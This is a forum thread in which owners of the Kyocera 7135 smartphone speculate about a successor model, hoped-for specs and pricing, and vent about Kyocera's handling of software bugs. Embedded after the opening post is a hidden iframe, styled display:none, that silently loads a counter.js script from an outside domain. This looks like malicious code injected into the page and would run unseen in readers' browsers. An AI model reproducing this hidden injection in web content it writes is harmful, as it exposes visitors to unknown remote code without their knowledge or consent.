+ Reply to Thread

7135 updated model?

do you think kyo will update the phone... such as a "7155" with a features such as a 100+ mhz processor, high resolution display, and 32KB on board memory? or do you think that they will do like they did with the 6035 and just lower the price and then come out with a totally new model?

sanyo did a good job with the 4500/4700/4900 models. each one got progressively thinner, lighter and added a few more features, but the price stayed about same for them all.

you'd figure that most 7135 owners would be willing to pay another $400 for a reasonable upgrade in a year or two that improves video and internet usability.

(i searched a bit. sorry if this thread has been done before. please point the way if it has)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

ok... i guess the question is would you all be willing to buy a "7155" in a year or so for $400-500 if it had a 100+ mhz processor, high resolution display, 32MB on board memory, and OS5? (plus a few extras like bluetooth and a better usb transfer rate)

Originally posted by mojojomo
    ok... i guess the question is would you all be willing to buy a "7155" in a year or so for $400-500 if it had a 100+ mhz processor, high resolution display, 32MB on board memory, and OS5? (plus a few extras like bluetooth and a better usb transfer rate)
    Probably, but I doubt I'll wait a year to replace my 7135. Plus, in a year those specs may not be that impressive
    Please visit my picture site: Robert-O-Rama :)

successor to the 7135 ?

With all the buzz from Samsung, Sony, Motorola, Linux phones, etc. it is concerning that there doesn't seem to be much in the way of even rumors about a successor to the 7135...

It would be a shame that the marketing and implementation missteps of the 7135 would deprive the market (and us!) of such a valuable innovator and producer of Smart/PDAphones as Kyocera. Isn't there anything on the drawing board to hear about ?

All the press is talking about is the death of the PDA and the inevitable dominance of the PDAphone. This is no time for Kyocera and Palmphones to give up... maybe I'm out of the loop, but...

The 7135 considerably narrowed the gap between a smartphone and a laptop. (I stopped carrying a laptop when I got the 6035 some years ago.) A fast processor would better display Web pages. I can easily make do with one of the current text-only browsers for most of my needs, but if a new model better handled graphics, I'd buy it.

I think you'd have to add some video capture capability to the phone as well as the specs given. Some "dumb" phones have some better features now than the "smart" phones have.

Eventually I would buy it. If they really impressed me with it I'd jump on it.

'Some of the best surprises, are the ones you don't know about'

Originally posted by mojojomo
    I don't know if we'll have the chance. It feels to me like Kyocera is focusing its talents, energy and financial resources in other directions. I hate to say this, but I'm feeling as though my next smartphone will not be a Kyo.
    Dave

7135 probably has 12-24 mo shelf life . . .

I remember when Dan from Dan Cellphones said to me when he was out of stock of some accessories 6 mos ago that he is leary about keeping too much on hand for a particular cell phone model as they go obsolete very quickly. Since he stocks access. for so many different phones who would know better about the shelf life of a particular model than Dan. So I'm sure a new Kyo model is already being tested. I know I've gone through at least 10 models of cellphones in the past 6 or 7 years each one was the leading technology for it's short lived year. Right now and over the past year the 7135 fits my needs more than I could have hoped for. But of course, I'll upgrade when a thinner more stable model comes out. I'm not tied to Kyocera though, For it's premium price, $500 plus access. I've found Kyo to be very unresponsive to fix problems such as the software glitches, resets, Palm programs that don't run right on the 7135 (why did I buy a Plam format if so many Palm programs won't run on it) and other problems such as the contrast bug which has been with us from the 7135's inception which Kyo won't correct ( I won't recommend Kyo to anyone now because of this). How many of us who already spent $500, could afford to have this glitch corrected by spending another $500 on the next model. For this . . . I have no love lost for Kyocera. After a year, I would be happy switch to another company who offered a clamsell design and hopefully thinner in size. In my area, Verizon has great coverage, after I switched from Sprint. But it's a horse race with the wireless providers as they buy up other companies so they will swap places on the best coverage from year to year (Sprints customer service was always awful and I found Verizon's to be great). At least we will be able to keep our phone #'s now. So the balls now back in the consumer's court on who will have the best deal from year to year. If you want to always be moving up to the latest devices don't lock yourself in to a two year contract (just pay a little more upfront for the phone). Problem now unlike past years, I could sell my old (1 year) phone to someone in my office and the cost of my upgrade would be about $100. But over the last few years with Trimodes, Pictures, Digital etc. Our phones our almost obsolete when we buy them. So enjoy the 7135 as there is nothing out there right now that comes close to it IMO. And I look forward to the next manufacturer who comes out with a better model. I guess it's just the thrill of the chase for me. How many of you out there already own 5 digital camera's. It amazes me I've been married to the same wife for 30 years. I wonder how long I would have been married if she came in a "digital" model? :angel2
    Just a rant on a lazy, hazy Sunday!!!

Re: 7135 probably has 12-24 mo shelf life . . .

Originally posted by Expidia
    It amazes me I've been married to the same wife for 30 years. I wonder how long I would have been married if she came in a "digital" model?
    Presumably you feel about your wife from time to time at least what Keanu says about the agents in Reloaded: "Hmmm... Upgrades!..."

Re: successor to the 7135 ?

Originally posted by monkeyboy
    With all the buzz from Samsung, Sony, Motorola, Linux phones, etc. it is concerning that there doesn't seem to be much in the way of even rumors about a successor to the 7135...
    well my thread got blindsided into this thread... what I really want to know is: Hasn't anybody heard anything about Kyocera's plans for future Palmphones ? Sure there must be moles out there that have some shred of info-rumor, one way or another.. its been a long time since the release of the 7135...

Re: Re: successor to the 7135 ?

Originally posted by monkeyboy
    what I really want to know is: Hasn't anybody heard anything about Kyocera's plans for future Palmphones ?
    I haven't heard anything... which doesn't surprise me too much at this point. I'm thinking that if we don't start hearing something within 2-3 months it'll be time to start being paranoid
    Please visit my picture site: Robert-O-Rama :)